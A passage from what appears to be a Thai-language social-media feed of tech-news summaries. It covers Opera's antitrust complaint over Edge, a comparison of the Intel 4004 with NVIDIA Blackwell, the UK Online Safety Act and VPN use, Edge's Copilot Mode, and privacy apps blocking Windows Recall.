    Opera ระบุว่า Microsoft ให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์เพื่อให้ติดตั้ง Edge เป็นค่าเริ่มต้น
    ส่งผลให้เบราว์เซอร์อื่นไม่มีโอกาสถูกติดตั้งล่วงหน้า
    เป็นการปิดกั้นการแข่งขันตั้งแต่ระดับฮาร์ดแวร์

    Opera เรียกร้องให้ CADE สั่งให้ Microsoft ยุติการใช้ dark patterns และเปิดโอกาสให้เบราว์เซอร์อื่นได้ติดตั้งล่วงหน้า
    รวมถึงการยกเลิกข้อกำหนด “S mode” ที่จำกัดการติดตั้งซอฟต์แวร์จากเว็บ
    เพื่อให้ผู้ใช้สามารถเลือกเบราว์เซอร์ได้อย่างอิสระ

    นี่ไม่ใช่ครั้งแรกที่ Opera ฟ้อง Microsoft ด้วยข้อกล่าวหาเรื่องการผูกขาดเบราว์เซอร์
    เคยฟ้องในสหภาพยุโรปเมื่อปี 2007 กรณี Internet Explorer
    และเคยเรียกร้องให้ Edge ถูกจัดเป็น “gatekeeper” ภายใต้กฎหมาย DMA ของ EU แต่ไม่สำเร็จ

    ผู้ใช้ Windows อาจไม่รู้ว่าการตั้งค่าเบราว์เซอร์ของตนถูกละเมิด
    เครื่องมือในระบบเปิดลิงก์ผ่าน Edge โดยไม่สนใจการตั้งค่าของผู้ใช้
    ส่งผลให้เกิดความสับสนและลดความไว้วางใจในระบบ

    การใช้ dark patterns อาจบั่นทอนเสรีภาพในการเลือกใช้ซอฟต์แวร์ของผู้บริโภค
    ผู้ใช้ถูกชักจูงโดยไม่รู้ตัวให้ใช้ Edge
    เป็นการลดโอกาสของเบราว์เซอร์คู่แข่งในการแข่งขันอย่างเป็นธรรม

    การให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์เพื่อให้ติดตั้ง Edge อาจละเมิดหลักการการแข่งขันเสรี
    เบราว์เซอร์อื่นถูกกีดกันตั้งแต่ระดับโรงงาน
    ส่งผลให้ผู้ใช้ไม่มีทางเลือกตั้งแต่ซื้อเครื่อง

    หากไม่มีการควบคุม อาจเกิดการผูกขาดในตลาดเบราว์เซอร์โดยไม่รู้ตัว
    ส่งผลต่อความหลากหลายของนวัตกรรมและความเป็นส่วนตัวของผู้ใช้
    อาจต้องพึ่งพาการแทรกแซงจากหน่วยงานกำกับดูแลในหลายประเทศ

    https://www.neowin.net/news/opera-files-complaint-against-microsoft-for-manipulating-customers-into-using-edge/
    🧭 เรื่องเล่าจากเบราว์เซอร์: เมื่อ Opera ลุกขึ้นสู้กับ Edge เพื่อความเป็นธรรมในการแข่งขัน ในเดือนกรกฎาคม 2025 Opera ได้ยื่นคำร้องต่อ CADE (หน่วยงานกำกับดูแลการแข่งขันของบราซิล) โดยกล่าวหาว่า Microsoft ใช้ “กลยุทธ์การออกแบบที่ชักจูง” หรือที่เรียกว่า dark patterns เพื่อผลักดันให้ผู้ใช้ Windows ใช้ Edge เป็นเบราว์เซอร์หลัก ทั้งที่ผู้ใช้ตั้งค่าเบราว์เซอร์อื่นไว้แล้ว Opera ระบุว่า Microsoft: - ให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์ (OEMs) เพื่อให้ติดตั้ง Edge เป็นค่าเริ่มต้น - ไม่เปิดโอกาสให้เบราว์เซอร์อื่น เช่น Opera ได้รับการติดตั้งล่วงหน้า - ใช้เครื่องมือในระบบ เช่น Widgets, Teams, Search และ Outlook เปิดลิงก์ผ่าน Edge โดยไม่สนใจการตั้งค่าของผู้ใช้ - แสดงข้อความรบกวนเมื่อผู้ใช้พยายามดาวน์โหลดเบราว์เซอร์อื่น Opera หวังว่าบราซิลจะเป็นตัวอย่างให้ประเทศอื่นดำเนินการตาม และเรียกร้องให้ Microsoft ยุติการใช้กลยุทธ์เหล่านี้ พร้อมเปิดโอกาสให้ผู้ใช้เลือกเบราว์เซอร์ได้อย่างเสรี ✅ Opera ยื่นคำร้องต่อ CADE ในบราซิล กล่าวหา Microsoft ใช้กลยุทธ์ไม่เป็นธรรมเพื่อผลักดัน Edge ➡️ เป็นการฟ้องร้องในตลาดสำคัญของ Opera ซึ่งมีผู้ใช้จำนวนมาก ➡️ หวังให้บราซิลเป็นแบบอย่างระดับโลกในการควบคุม Big Tech ✅ Microsoft ถูกกล่าวหาว่าใช้ “manipulative design tactics” และ “dark patterns” ใน Windows ➡️ เช่น การเปิดไฟล์ PDF ผ่าน Edge แม้ผู้ใช้ตั้งค่าเบราว์เซอร์อื่น ➡️ การแสดงข้อความรบกวนเมื่อพยายามดาวน์โหลดเบราว์เซอร์คู่แข่ง ✅ Opera ระบุว่า Microsoft ให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์เพื่อให้ติดตั้ง Edge เป็นค่าเริ่มต้น ➡️ ส่งผลให้เบราว์เซอร์อื่นไม่มีโอกาสถูกติดตั้งล่วงหน้า ➡️ เป็นการปิดกั้นการแข่งขันตั้งแต่ระดับฮาร์ดแวร์ ✅ Opera เรียกร้องให้ CADE สั่งให้ Microsoft ยุติการใช้ dark patterns และเปิดโอกาสให้เบราว์เซอร์อื่นได้ติดตั้งล่วงหน้า ➡️ รวมถึงการยกเลิกข้อกำหนด “S mode” ที่จำกัดการติดตั้งซอฟต์แวร์จากเว็บ ➡️ เพื่อให้ผู้ใช้สามารถเลือกเบราว์เซอร์ได้อย่างอิสระ ✅ นี่ไม่ใช่ครั้งแรกที่ Opera ฟ้อง Microsoft ด้วยข้อกล่าวหาเรื่องการผูกขาดเบราว์เซอร์ ➡️ เคยฟ้องในสหภาพยุโรปเมื่อปี 2007 กรณี Internet Explorer ➡️ และเคยเรียกร้องให้ Edge ถูกจัดเป็น “gatekeeper” ภายใต้กฎหมาย DMA ของ EU แต่ไม่สำเร็จ ‼️ ผู้ใช้ Windows อาจไม่รู้ว่าการตั้งค่าเบราว์เซอร์ของตนถูกละเมิด ⛔ เครื่องมือในระบบเปิดลิงก์ผ่าน Edge โดยไม่สนใจการตั้งค่าของผู้ใช้ ⛔ ส่งผลให้เกิดความสับสนและลดความไว้วางใจในระบบ ‼️ การใช้ dark patterns อาจบั่นทอนเสรีภาพในการเลือกใช้ซอฟต์แวร์ของผู้บริโภค ⛔ ผู้ใช้ถูกชักจูงโดยไม่รู้ตัวให้ใช้ Edge ⛔ เป็นการลดโอกาสของเบราว์เซอร์คู่แข่งในการแข่งขันอย่างเป็นธรรม ‼️ การให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์เพื่อให้ติดตั้ง Edge อาจละเมิดหลักการการแข่งขันเสรี ⛔ เบราว์เซอร์อื่นถูกกีดกันตั้งแต่ระดับโรงงาน ⛔ ส่งผลให้ผู้ใช้ไม่มีทางเลือกตั้งแต่ซื้อเครื่อง ‼️ หากไม่มีการควบคุม อาจเกิดการผูกขาดในตลาดเบราว์เซอร์โดยไม่รู้ตัว ⛔ ส่งผลต่อความหลากหลายของนวัตกรรมและความเป็นส่วนตัวของผู้ใช้ ⛔ อาจต้องพึ่งพาการแทรกแซงจากหน่วยงานกำกับดูแลในหลายประเทศ https://www.neowin.net/news/opera-files-complaint-against-microsoft-for-manipulating-customers-into-using-edge/
    WWW.NEOWIN.NET
    Opera files complaint against Microsoft for manipulating customers into using Edge
    Opera has filed a complaint against Microsoft Edge, claiming that the Redmond firm uses deceptive tactics to get customers to use its browser.
    0 ความคิดเห็น 0 การแบ่งปัน 130 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกชิป: จาก 4 บิตสู่ 10 ล้านล้านพารามิเตอร์

    ย้อนกลับไปปี 1971 Intel เปิดตัวชิป 4004 ซึ่งเป็นไมโครโปรเซสเซอร์ตัวแรกของโลก ด้วยความเร็วเพียง 740kHz และประมวลผลได้ 92,600 คำสั่งต่อวินาที (IPS) ใช้หน่วยความจำแค่ 4KB ROM และ 640 bytes RAM—เล็กจนเทียบไม่ได้กับมือถือยุคนี้

    แต่ในปี 2025 NVIDIA เปิดตัว Blackwell ซึ่งเป็นชิป AI ที่ทรงพลังที่สุดในโลก ด้วยพลังประมวลผลสูงถึง 20 PetaFLOPS ต่อ GPU รองรับโมเดลขนาด 10 ล้านล้านพารามิเตอร์ และใช้เทคโนโลยี NVLink รุ่นที่ 5 ที่เชื่อมต่อ GPU ได้ถึง 576 ตัวในคลัสเตอร์เดียว

    เมื่อเปรียบเทียบกันแล้ว Blackwell มีประสิทธิภาพมากกว่า Intel 4004 ถึง 217 ล้านเท่า! นี่คือผลลัพธ์ของการพัฒนาอย่างต่อเนื่องตามกฎของ Moore’s Law และความต้องการด้าน AI ที่เติบโตแบบทวีคูณ

    Intel 4004 คือจุดเริ่มต้นของยุคไมโครโปรเซสเซอร์ในปี 1971
    ความเร็ว 740kHz, 4-bit CPU, 2,300 ทรานซิสเตอร์
    ใช้ในเครื่องคิดเลขของบริษัท Busicom

    NVIDIA Blackwell คือชิป AI ที่ทรงพลังที่สุดในปี 2025
    มี 208 พันล้านทรานซิสเตอร์
    รองรับโมเดล AI ขนาด 10 ล้านล้านพารามิเตอร์
    ใช้เทคโนโลยี NVLink 5.0 ที่มีแบนด์วิดธ์ 1.8TB/s ต่อ GPU

    Blackwell มีพลังประมวลผลสูงถึง 20 PetaFLOPS ต่อ GPU
    ใช้หน่วยความจำ HBM3e สูงสุด 192GB
    มี Tensor Core รุ่นใหม่ที่รองรับ FP4 สำหรับ AI inference

    การพัฒนาใน 50 ปีทำให้ประสิทธิภาพเพิ่มขึ้นถึง 217 ล้านเท่า
    จาก 92,600 IPS ของ 4004 สู่ระดับ ExaFLOPS ของ Blackwell
    สะท้อนความก้าวหน้าของมนุษยชาติในด้านคอมพิวเตอร์

    Blackwell ถูกนำไปใช้ในระบบ AI ของบริษัทชั้นนำทั่วโลก
    เช่น Microsoft Azure, Google DeepMind, Meta, Tesla และ OpenAI
    ใช้ในงาน LLM, quantum computing, และ data analytics

    https://wccftech.com/computing-power-has-skyrocketed-over-the-last-50-years-with-a-whopping-217-million-times-increase/
    🧠 เรื่องเล่าจากโลกชิป: จาก 4 บิตสู่ 10 ล้านล้านพารามิเตอร์ ย้อนกลับไปปี 1971 Intel เปิดตัวชิป 4004 ซึ่งเป็นไมโครโปรเซสเซอร์ตัวแรกของโลก ด้วยความเร็วเพียง 740kHz และประมวลผลได้ 92,600 คำสั่งต่อวินาที (IPS) ใช้หน่วยความจำแค่ 4KB ROM และ 640 bytes RAM—เล็กจนเทียบไม่ได้กับมือถือยุคนี้ แต่ในปี 2025 NVIDIA เปิดตัว Blackwell ซึ่งเป็นชิป AI ที่ทรงพลังที่สุดในโลก ด้วยพลังประมวลผลสูงถึง 20 PetaFLOPS ต่อ GPU รองรับโมเดลขนาด 10 ล้านล้านพารามิเตอร์ และใช้เทคโนโลยี NVLink รุ่นที่ 5 ที่เชื่อมต่อ GPU ได้ถึง 576 ตัวในคลัสเตอร์เดียว เมื่อเปรียบเทียบกันแล้ว Blackwell มีประสิทธิภาพมากกว่า Intel 4004 ถึง 217 ล้านเท่า! นี่คือผลลัพธ์ของการพัฒนาอย่างต่อเนื่องตามกฎของ Moore’s Law และความต้องการด้าน AI ที่เติบโตแบบทวีคูณ ✅ Intel 4004 คือจุดเริ่มต้นของยุคไมโครโปรเซสเซอร์ในปี 1971 ➡️ ความเร็ว 740kHz, 4-bit CPU, 2,300 ทรานซิสเตอร์ ➡️ ใช้ในเครื่องคิดเลขของบริษัท Busicom ✅ NVIDIA Blackwell คือชิป AI ที่ทรงพลังที่สุดในปี 2025 ➡️ มี 208 พันล้านทรานซิสเตอร์ ➡️ รองรับโมเดล AI ขนาด 10 ล้านล้านพารามิเตอร์ ➡️ ใช้เทคโนโลยี NVLink 5.0 ที่มีแบนด์วิดธ์ 1.8TB/s ต่อ GPU ✅ Blackwell มีพลังประมวลผลสูงถึง 20 PetaFLOPS ต่อ GPU ➡️ ใช้หน่วยความจำ HBM3e สูงสุด 192GB ➡️ มี Tensor Core รุ่นใหม่ที่รองรับ FP4 สำหรับ AI inference ✅ การพัฒนาใน 50 ปีทำให้ประสิทธิภาพเพิ่มขึ้นถึง 217 ล้านเท่า ➡️ จาก 92,600 IPS ของ 4004 สู่ระดับ ExaFLOPS ของ Blackwell ➡️ สะท้อนความก้าวหน้าของมนุษยชาติในด้านคอมพิวเตอร์ ✅ Blackwell ถูกนำไปใช้ในระบบ AI ของบริษัทชั้นนำทั่วโลก ➡️ เช่น Microsoft Azure, Google DeepMind, Meta, Tesla และ OpenAI ➡️ ใช้ในงาน LLM, quantum computing, และ data analytics https://wccftech.com/computing-power-has-skyrocketed-over-the-last-50-years-with-a-whopping-217-million-times-increase/
    WCCFTECH.COM
    Computing Power Has Skyrocketed Over the Last 50 Years, With a Whopping 217 Million Times Increase in Performance — From the Humble Intel 4004 to Cutting-Edge NVIDIA Blackwell Chip
    The evolution of humans has been the "talk of the town," but in the computing segment, we have achieved a lot in just five decades.
    0 ความคิดเห็น 0 การแบ่งปัน 105 มุมมอง 0 รีวิว
  • เรื่องเล่าจากสหราชอาณาจักร: เมื่อ “ความปลอดภัยออนไลน์” กลายเป็นภัยต่อสิทธิส่วนบุคคล

    กฎหมาย Online Safety Act ของสหราชอาณาจักรมีเป้าหมายเพื่อปกป้องเด็กจากเนื้อหาออนไลน์ที่เป็นอันตราย เช่น สื่อลามก การยุยงให้ทำร้ายตัวเอง หรือการใช้สารเสพติด โดยบังคับให้เว็บไซต์และแอปต่างๆ ต้องตรวจสอบอายุผู้ใช้ก่อนเข้าถึงเนื้อหาเหล่านี้

    แต่การตรวจสอบอายุที่ใช้เทคโนโลยีอย่างการสแกนใบหน้า บัตรประชาชน หรือบัตรเครดิต กลับสร้างความกังวลอย่างหนักในหมู่ผู้เชี่ยวชาญด้านสิทธิดิจิทัล เพราะมันอาจนำไปสู่การละเมิดความเป็นส่วนตัว การเฝ้าระวัง และการเซ็นเซอร์เนื้อหาโดยไม่จำเป็น

    ผลกระทบที่เกิดขึ้นทันทีคือการหลั่งไหลของผู้ใช้งานไปยังแอป VPN เพื่อหลบเลี่ยงการตรวจสอบอายุ โดย Proton VPN รายงานว่ามีผู้สมัครใช้งานเพิ่มขึ้นกว่า 1,400% ภายในไม่กี่ชั่วโมงหลังกฎหมายมีผลบังคับใช้

    กฎหมาย Online Safety Act มีผลบังคับใช้ในสหราชอาณาจักรเมื่อ 25 กรกฎาคม 2025
    บังคับให้เว็บไซต์ที่มีเนื้อหาสำหรับผู้ใหญ่ต้องตรวจสอบอายุผู้ใช้
    รวมถึงโซเชียลมีเดีย เกม และแอปหาคู่

    วิธีการตรวจสอบอายุที่ถูกนำมาใช้
    สแกนใบหน้า
    อัปโหลดบัตรประชาชนหรือบัตรเครดิต
    ใช้บริการตรวจสอบอายุจากบุคคลที่สาม

    เกิดกระแสต่อต้านกฎหมายอย่างรุนแรง
    คำร้องให้ยกเลิกกฎหมายมีผู้ลงชื่อกว่า 340,000 คน
    ผู้ริเริ่มคือ Alex Baynham ผู้ก่อตั้งพรรค Build

    ผู้ใช้งานแห่ใช้ VPN เพื่อหลบเลี่ยงการตรวจสอบอายุ
    Proton VPN มีผู้สมัครเพิ่มขึ้น 1,400%
    VPN กลายเป็นทางเลือกหลักในการรักษาความเป็นส่วนตัว

    ผู้เชี่ยวชาญเตือนถึงความเสี่ยงของการเก็บข้อมูลส่วนตัว
    การละเมิดความเป็นส่วนตัว
    ความเสี่ยงจากการถูกแฮก เช่นกรณีแอป Tea ที่ข้อมูลหลุด

    https://www.techradar.com/vpn/vpn-privacy-security/over-340-000-brits-want-to-repeal-the-uk-online-safety-act-heres-how-to-get-your-say
    📣 เรื่องเล่าจากสหราชอาณาจักร: เมื่อ “ความปลอดภัยออนไลน์” กลายเป็นภัยต่อสิทธิส่วนบุคคล กฎหมาย Online Safety Act ของสหราชอาณาจักรมีเป้าหมายเพื่อปกป้องเด็กจากเนื้อหาออนไลน์ที่เป็นอันตราย เช่น สื่อลามก การยุยงให้ทำร้ายตัวเอง หรือการใช้สารเสพติด โดยบังคับให้เว็บไซต์และแอปต่างๆ ต้องตรวจสอบอายุผู้ใช้ก่อนเข้าถึงเนื้อหาเหล่านี้ แต่การตรวจสอบอายุที่ใช้เทคโนโลยีอย่างการสแกนใบหน้า บัตรประชาชน หรือบัตรเครดิต กลับสร้างความกังวลอย่างหนักในหมู่ผู้เชี่ยวชาญด้านสิทธิดิจิทัล เพราะมันอาจนำไปสู่การละเมิดความเป็นส่วนตัว การเฝ้าระวัง และการเซ็นเซอร์เนื้อหาโดยไม่จำเป็น ผลกระทบที่เกิดขึ้นทันทีคือการหลั่งไหลของผู้ใช้งานไปยังแอป VPN เพื่อหลบเลี่ยงการตรวจสอบอายุ โดย Proton VPN รายงานว่ามีผู้สมัครใช้งานเพิ่มขึ้นกว่า 1,400% ภายในไม่กี่ชั่วโมงหลังกฎหมายมีผลบังคับใช้ ✅ กฎหมาย Online Safety Act มีผลบังคับใช้ในสหราชอาณาจักรเมื่อ 25 กรกฎาคม 2025 ➡️ บังคับให้เว็บไซต์ที่มีเนื้อหาสำหรับผู้ใหญ่ต้องตรวจสอบอายุผู้ใช้ ➡️ รวมถึงโซเชียลมีเดีย เกม และแอปหาคู่ ✅ วิธีการตรวจสอบอายุที่ถูกนำมาใช้ ➡️ สแกนใบหน้า ➡️ อัปโหลดบัตรประชาชนหรือบัตรเครดิต ➡️ ใช้บริการตรวจสอบอายุจากบุคคลที่สาม ✅ เกิดกระแสต่อต้านกฎหมายอย่างรุนแรง ➡️ คำร้องให้ยกเลิกกฎหมายมีผู้ลงชื่อกว่า 340,000 คน ➡️ ผู้ริเริ่มคือ Alex Baynham ผู้ก่อตั้งพรรค Build ✅ ผู้ใช้งานแห่ใช้ VPN เพื่อหลบเลี่ยงการตรวจสอบอายุ ➡️ Proton VPN มีผู้สมัครเพิ่มขึ้น 1,400% ➡️ VPN กลายเป็นทางเลือกหลักในการรักษาความเป็นส่วนตัว ✅ ผู้เชี่ยวชาญเตือนถึงความเสี่ยงของการเก็บข้อมูลส่วนตัว ➡️ การละเมิดความเป็นส่วนตัว ➡️ ความเสี่ยงจากการถูกแฮก เช่นกรณีแอป Tea ที่ข้อมูลหลุด https://www.techradar.com/vpn/vpn-privacy-security/over-340-000-brits-want-to-repeal-the-uk-online-safety-act-heres-how-to-get-your-say
    WWW.TECHRADAR.COM
    Over 340,000 Brits want to repeal the UK Online Safety Act – here's how to get your say
    New age verification checks are sparking concerns in terms of privacy, security, and free speech
    0 ความคิดเห็น 0 การแบ่งปัน 142 มุมมอง 0 รีวิว
  • เรื่องเล่าจากเบราว์เซอร์: เมื่อ Edge กลายเป็นผู้ช่วยที่รู้ใจและลงมือแทนคุณ

    Microsoft เปิดตัวฟีเจอร์ใหม่ใน Edge ที่ชื่อว่า Copilot Mode ซึ่งเป็นโหมดทดลองที่รวมเอา AI เข้ามาเป็นผู้ช่วยในการท่องเว็บอย่างเต็มรูปแบบ ไม่ใช่แค่แสดงผลการค้นหา แต่สามารถเข้าใจบริบทของสิ่งที่คุณกำลังทำในหลายแท็บพร้อมกัน และช่วยเปรียบเทียบข้อมูล, สรุปเนื้อหา, หรือแม้แต่จองบริการให้คุณได้

    Copilot Mode มาพร้อมอินเทอร์เฟซใหม่ที่เรียบง่าย มีช่องป้อนคำสั่งเดียวสำหรับแชต, ค้นหา, และนำทางเว็บ โดยสามารถสั่งงานด้วยเสียง และแสดงผลในแถบด้านข้างโดยไม่รบกวนหน้าเว็บหลัก

    Microsoft ยังวางแผนให้ Copilot เข้าถึงประวัติการใช้งานและข้อมูลล็อกอิน (ถ้าได้รับอนุญาต) เพื่อช่วยทำงานที่ซับซ้อน เช่น จองร้านอาหาร, ตรวจสอบสภาพอากาศ, หรือแนะนำวิดีโอสอนใช้งานต่าง ๆ

    Copilot Mode เป็นโหมดทดลองใหม่ใน Microsoft Edge ที่ใช้ AI เพื่อช่วยท่องเว็บ
    รวมแชต, ค้นหา, และนำทางไว้ในช่องป้อนคำสั่งเดียว
    แสดงผลในแถบด้านข้างโดยไม่รบกวนหน้าเว็บหลัก

    Copilot สามารถเข้าใจบริบทจากหลายแท็บพร้อมกัน (multi-tab context)
    ช่วยเปรียบเทียบข้อมูลจากหลายเว็บไซต์ได้ทันที
    ลดการสลับแท็บและเพิ่มความเร็วในการตัดสินใจ

    สามารถสั่งงานด้วยเสียงผ่านฟีเจอร์ Voice Navigation
    เช่น “เปิดแท็บเปรียบเทียบมือถือรุ่นนี้กับรุ่นนั้น”
    ลดการคลิกและพิมพ์ เพิ่มความสะดวกในการใช้งาน

    Copilot จะมีฟีเจอร์ “journeys” ที่ช่วยจัดระเบียบการท่องเว็บตามหัวข้อ
    เช่น ถ้าคุณค้นหาวิธีสร้างธุรกิจออนไลน์ Copilot จะเสนอวิดีโอสอนและแหล่งข้อมูลที่เกี่ยวข้อง
    ช่วยให้คุณกลับมาใช้งานต่อได้ง่ายขึ้น

    Copilot Mode เป็นฟีเจอร์แบบ opt-in และสามารถเปิด/ปิดได้ตลอดเวลา
    มีสัญลักษณ์ชัดเจนเมื่อ Copilot กำลังทำงาน
    รองรับทั้ง Windows และ macOS

    https://www.neowin.net/news/microsoft-edge-is-turning-into-ai-browser-with-new-copilot-mode/
    🧠 เรื่องเล่าจากเบราว์เซอร์: เมื่อ Edge กลายเป็นผู้ช่วยที่รู้ใจและลงมือแทนคุณ Microsoft เปิดตัวฟีเจอร์ใหม่ใน Edge ที่ชื่อว่า Copilot Mode ซึ่งเป็นโหมดทดลองที่รวมเอา AI เข้ามาเป็นผู้ช่วยในการท่องเว็บอย่างเต็มรูปแบบ ไม่ใช่แค่แสดงผลการค้นหา แต่สามารถเข้าใจบริบทของสิ่งที่คุณกำลังทำในหลายแท็บพร้อมกัน และช่วยเปรียบเทียบข้อมูล, สรุปเนื้อหา, หรือแม้แต่จองบริการให้คุณได้ Copilot Mode มาพร้อมอินเทอร์เฟซใหม่ที่เรียบง่าย มีช่องป้อนคำสั่งเดียวสำหรับแชต, ค้นหา, และนำทางเว็บ โดยสามารถสั่งงานด้วยเสียง และแสดงผลในแถบด้านข้างโดยไม่รบกวนหน้าเว็บหลัก Microsoft ยังวางแผนให้ Copilot เข้าถึงประวัติการใช้งานและข้อมูลล็อกอิน (ถ้าได้รับอนุญาต) เพื่อช่วยทำงานที่ซับซ้อน เช่น จองร้านอาหาร, ตรวจสอบสภาพอากาศ, หรือแนะนำวิดีโอสอนใช้งานต่าง ๆ ✅ Copilot Mode เป็นโหมดทดลองใหม่ใน Microsoft Edge ที่ใช้ AI เพื่อช่วยท่องเว็บ ➡️ รวมแชต, ค้นหา, และนำทางไว้ในช่องป้อนคำสั่งเดียว ➡️ แสดงผลในแถบด้านข้างโดยไม่รบกวนหน้าเว็บหลัก ✅ Copilot สามารถเข้าใจบริบทจากหลายแท็บพร้อมกัน (multi-tab context) ➡️ ช่วยเปรียบเทียบข้อมูลจากหลายเว็บไซต์ได้ทันที ➡️ ลดการสลับแท็บและเพิ่มความเร็วในการตัดสินใจ ✅ สามารถสั่งงานด้วยเสียงผ่านฟีเจอร์ Voice Navigation ➡️ เช่น “เปิดแท็บเปรียบเทียบมือถือรุ่นนี้กับรุ่นนั้น” ➡️ ลดการคลิกและพิมพ์ เพิ่มความสะดวกในการใช้งาน ✅ Copilot จะมีฟีเจอร์ “journeys” ที่ช่วยจัดระเบียบการท่องเว็บตามหัวข้อ ➡️ เช่น ถ้าคุณค้นหาวิธีสร้างธุรกิจออนไลน์ Copilot จะเสนอวิดีโอสอนและแหล่งข้อมูลที่เกี่ยวข้อง ➡️ ช่วยให้คุณกลับมาใช้งานต่อได้ง่ายขึ้น ✅ Copilot Mode เป็นฟีเจอร์แบบ opt-in และสามารถเปิด/ปิดได้ตลอดเวลา ➡️ มีสัญลักษณ์ชัดเจนเมื่อ Copilot กำลังทำงาน ➡️ รองรับทั้ง Windows และ macOS https://www.neowin.net/news/microsoft-edge-is-turning-into-ai-browser-with-new-copilot-mode/
    WWW.NEOWIN.NET
    Microsoft Edge is turning into AI browser with new Copilot Mode
    Microsoft Edge is getting a big update with Copilot Mode, a new tool that supercharges browsing with AI-powered features like multi-tab context, Copilot actions, and more.
    0 ความคิดเห็น 0 การแบ่งปัน 75 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: เมื่อ “ความจำดีเกินไป” กลายเป็นภัยต่อความเป็นส่วนตัว

    ลองจินตนาการว่า Windows บันทึกภาพหน้าจอของคุณทุก ๆ 5 วินาที เพื่อให้คุณสามารถย้อนดูสิ่งที่เคยทำได้เหมือนมี “ความจำถ่ายภาพ” แบบ AI — ฟังดูสะดวกใช่ไหม? แต่สำหรับนักพัฒนาแอปที่ใส่ใจเรื่องความเป็นส่วนตัว เช่น Signal, Brave และ AdGuard นี่คือ “ฝันร้ายด้านความเป็นส่วนตัว” ที่ต้องรีบจัดการ

    ฟีเจอร์ Windows Recall ถูกออกแบบมาให้บันทึกภาพหน้าจออย่างต่อเนื่องเพื่อช่วยให้ผู้ใช้ค้นหาสิ่งที่เคยเห็นหรือทำได้ง่ายขึ้น แต่ปัญหาคือมันอาจบันทึกข้อมูลที่ละเอียดอ่อน เช่น รหัสผ่าน, ข้อมูลทางการเงิน, หรือข้อความส่วนตัว โดยไม่ได้รับความยินยอมจากผู้เกี่ยวข้อง

    Signal เป็นแอปแรกที่บล็อกไม่ให้ Recall จับภาพหน้าต่างแชทของตนได้ และล่าสุด Brave กับ AdGuard ก็ประกาศใช้วิธีการของตัวเองในการป้องกันไม่ให้ Recall บันทึกข้อมูลจากแอปของพวกเขาเช่นกัน

    Windows Recall คือฟีเจอร์ใหม่ของ Microsoft ที่บันทึกภาพหน้าจอทุกไม่กี่วินาที
    ใช้ AI เพื่อช่วยค้นหาข้อมูลที่เคยเห็นหรือทำบนเครื่อง
    ข้อมูลถูกเก็บไว้ในเครื่องและวิเคราะห์แบบออฟไลน์

    Signal, Brave และ AdGuard ออกมาต่อต้านฟีเจอร์นี้
    Signal ใช้ DRM API เพื่อป้องกันการจับภาพหน้าต่างแชท
    Brave ใช้ SetInputScope API เพื่อบล็อก Recall จากการจับภาพทุกแท็บในเบราว์เซอร์
    AdGuard เพิ่มตัวเลือก “Disable Windows Recall” ในเวอร์ชันล่าสุด

    Microsoft อนุญาตให้นักพัฒนาใช้ API เพื่อบล็อก Recall
    เป็นการตอบสนองต่อเสียงวิจารณ์จากผู้ใช้และนักวิจัยด้านความปลอดภัย
    แต่ยังมีข้อจำกัดในการควบคุมระดับแอปที่ไม่ใช่เบราว์เซอร์

    Brave ตั้งค่าบล็อก Recall เป็นค่าเริ่มต้น
    ผู้ใช้สามารถเปิดใช้งานได้เองหากต้องการ
    เป็นการปกป้องความเป็นส่วนตัวโดยไม่ต้องพึ่งผู้ใช้ตัดสินใจเองทุกครั้ง

    https://www.techspot.com/news/108817-privacy-apps-signal-brave-adguard-push-back-against.html
    🧠 เรื่องเล่าจากข่าว: เมื่อ “ความจำดีเกินไป” กลายเป็นภัยต่อความเป็นส่วนตัว ลองจินตนาการว่า Windows บันทึกภาพหน้าจอของคุณทุก ๆ 5 วินาที เพื่อให้คุณสามารถย้อนดูสิ่งที่เคยทำได้เหมือนมี “ความจำถ่ายภาพ” แบบ AI — ฟังดูสะดวกใช่ไหม? แต่สำหรับนักพัฒนาแอปที่ใส่ใจเรื่องความเป็นส่วนตัว เช่น Signal, Brave และ AdGuard นี่คือ “ฝันร้ายด้านความเป็นส่วนตัว” ที่ต้องรีบจัดการ ฟีเจอร์ Windows Recall ถูกออกแบบมาให้บันทึกภาพหน้าจออย่างต่อเนื่องเพื่อช่วยให้ผู้ใช้ค้นหาสิ่งที่เคยเห็นหรือทำได้ง่ายขึ้น แต่ปัญหาคือมันอาจบันทึกข้อมูลที่ละเอียดอ่อน เช่น รหัสผ่าน, ข้อมูลทางการเงิน, หรือข้อความส่วนตัว โดยไม่ได้รับความยินยอมจากผู้เกี่ยวข้อง Signal เป็นแอปแรกที่บล็อกไม่ให้ Recall จับภาพหน้าต่างแชทของตนได้ และล่าสุด Brave กับ AdGuard ก็ประกาศใช้วิธีการของตัวเองในการป้องกันไม่ให้ Recall บันทึกข้อมูลจากแอปของพวกเขาเช่นกัน ✅ Windows Recall คือฟีเจอร์ใหม่ของ Microsoft ที่บันทึกภาพหน้าจอทุกไม่กี่วินาที ➡️ ใช้ AI เพื่อช่วยค้นหาข้อมูลที่เคยเห็นหรือทำบนเครื่อง ➡️ ข้อมูลถูกเก็บไว้ในเครื่องและวิเคราะห์แบบออฟไลน์ ✅ Signal, Brave และ AdGuard ออกมาต่อต้านฟีเจอร์นี้ ➡️ Signal ใช้ DRM API เพื่อป้องกันการจับภาพหน้าต่างแชท ➡️ Brave ใช้ SetInputScope API เพื่อบล็อก Recall จากการจับภาพทุกแท็บในเบราว์เซอร์ ➡️ AdGuard เพิ่มตัวเลือก “Disable Windows Recall” ในเวอร์ชันล่าสุด ✅ Microsoft อนุญาตให้นักพัฒนาใช้ API เพื่อบล็อก Recall ➡️ เป็นการตอบสนองต่อเสียงวิจารณ์จากผู้ใช้และนักวิจัยด้านความปลอดภัย ➡️ แต่ยังมีข้อจำกัดในการควบคุมระดับแอปที่ไม่ใช่เบราว์เซอร์ ✅ Brave ตั้งค่าบล็อก Recall เป็นค่าเริ่มต้น ➡️ ผู้ใช้สามารถเปิดใช้งานได้เองหากต้องการ ➡️ เป็นการปกป้องความเป็นส่วนตัวโดยไม่ต้องพึ่งผู้ใช้ตัดสินใจเองทุกครั้ง https://www.techspot.com/news/108817-privacy-apps-signal-brave-adguard-push-back-against.html
    WWW.TECHSPOT.COM
    Privacy apps Signal, Brave, and AdGuard push back against Windows Recall
